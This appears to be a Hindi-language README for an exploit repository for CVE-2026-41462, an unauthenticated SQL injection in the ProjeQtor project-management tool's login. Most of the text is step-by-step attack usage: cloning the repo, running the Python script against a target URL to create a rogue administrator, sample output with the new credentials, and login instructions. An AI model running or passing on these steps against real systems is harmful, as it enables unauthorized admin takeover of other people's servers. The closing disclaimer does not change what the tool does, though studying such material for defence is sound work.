
CVE-2026-41462
ProjeQtor ≤ 12.4.3 में गंभीर बिना प्रमाणीकरण SQL इंजेक्शन
CVE-2026-41462, ProjeQtor प्रोजेक्ट प्रबंधन टूल की लॉगिन कार्यक्षमता में एक गंभीर बिना प्रमाणीकरण SQL इंजेक्शन भेद्यता है।
python3 CVE-2026-41462.py -u http://target.com --create-admin
# With custom credentials
python3 CVE-2026-41462.py -u http://target.com --create-admin \
--username admin123 --password StrongPass2026!
जब शोषण सफल होता है, तो आपको इसके समान आउटपुट दिखाई देगा:
[+] Targeting: http://target.com
[+] Sending payload to create admin user 'hacker' ...
[+] Request sent successfully.
[+] New admin created → Username: hacker | Password: Admin123!
[+] Try logging in at: http://target.com/login.php
अपना ब्राउज़र खोलें और यहाँ जाएं:
http://target.com/login.php
स्क्रिप्ट आउटपुट में दिखाई गई क्रेडेंशियल्स का उपयोग करके लॉगिन करें।
यदि सफल रहता है, तो आप पूर्ण प्रशासनिक विशेषाधिकारों के साथ ProjeQtor एडमिन डैशबोर्ड पर पहुंच जाएंगे।
सफलता संकेतक:
| फ़ाइल | विवरण |
|---|---|
CVE-2026-41462.py | मुख्य शोषण स्क्रिप्ट |
CVE-2026-41462.yaml | Nuclei डिटेक्शन टेम्पलेट |
README.md | यह दस्तावेज़ |
रिपॉजिटरी क्लोन करें:
git clone https://github.com/0xBlackash/CVE-2026-41462.git
cd CVE-2026-41462
शोषण चलाएं:
python3 CVE-2026-41462.py -u http://target.com --create-admin
नव निर्मित एडमिन खाते से लॉगिन करें।
यह टूल केवल शैक्षिक उद्देश्यों और अधिकृत पेनेट्रेशन टेस्टिंग के लिए है। अनधिकृत उपयोग अवैध है।